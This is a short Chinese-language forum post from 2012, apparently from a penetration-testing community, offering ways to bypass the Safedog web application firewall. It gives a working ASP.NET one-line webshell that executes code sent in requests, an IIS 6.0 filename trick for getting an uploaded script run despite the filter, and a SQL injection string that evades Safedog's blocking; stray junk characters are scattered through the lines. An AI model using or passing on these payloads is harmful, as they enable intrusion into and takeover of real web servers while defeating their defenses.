中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]

作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。/ m1 l0 B" G  d% J
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。  X( p0 V, {7 T
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。; y# n3 P( ?0 B3 L8 `
) j5 x1 e# p1 m- q
2、IIS6.0解析漏洞遇到安全狗。
) S4 H, |7 ~- _: t$ t1 k3 ~- r文件名为8 y3 g2 o  d2 l+ p
http://www.xxxxx.com/sh3llc0de.asp;1.jpg8 R- X) T/ z5 p5 p
( y: d0 E* G7 c1 @2 r
这样的会被IIS安全狗果断屏蔽。
% S; _. m* g& N改成如下名称,IIS6一样会解析:3 {! B2 C& J+ J
www.xxxxx.com/;1.asp;1.jpg
: y* r# l6 `" g3 `  h8 l+ O) q  r
( G0 _% k8 T1 x1 ]7 V! l3、安全狗的注入绕过。
0 c9 f9 _% s( l' F/ `! b常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。) k$ M* Y+ B0 N& O
但如果:
+ v6 l9 M# L1 ar00ts.asp?r00ts.com=%00.&id=69%20 and 1=1; T$ w; U4 D) @' B8 B3 C% N: R
就可以成功绕过了。" L0 _$ X4 v& `/ ~  I% R) I

9 Q7 t/ U: z3 S
8 n' K' D5 W; L* M( I( z# \7 z




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2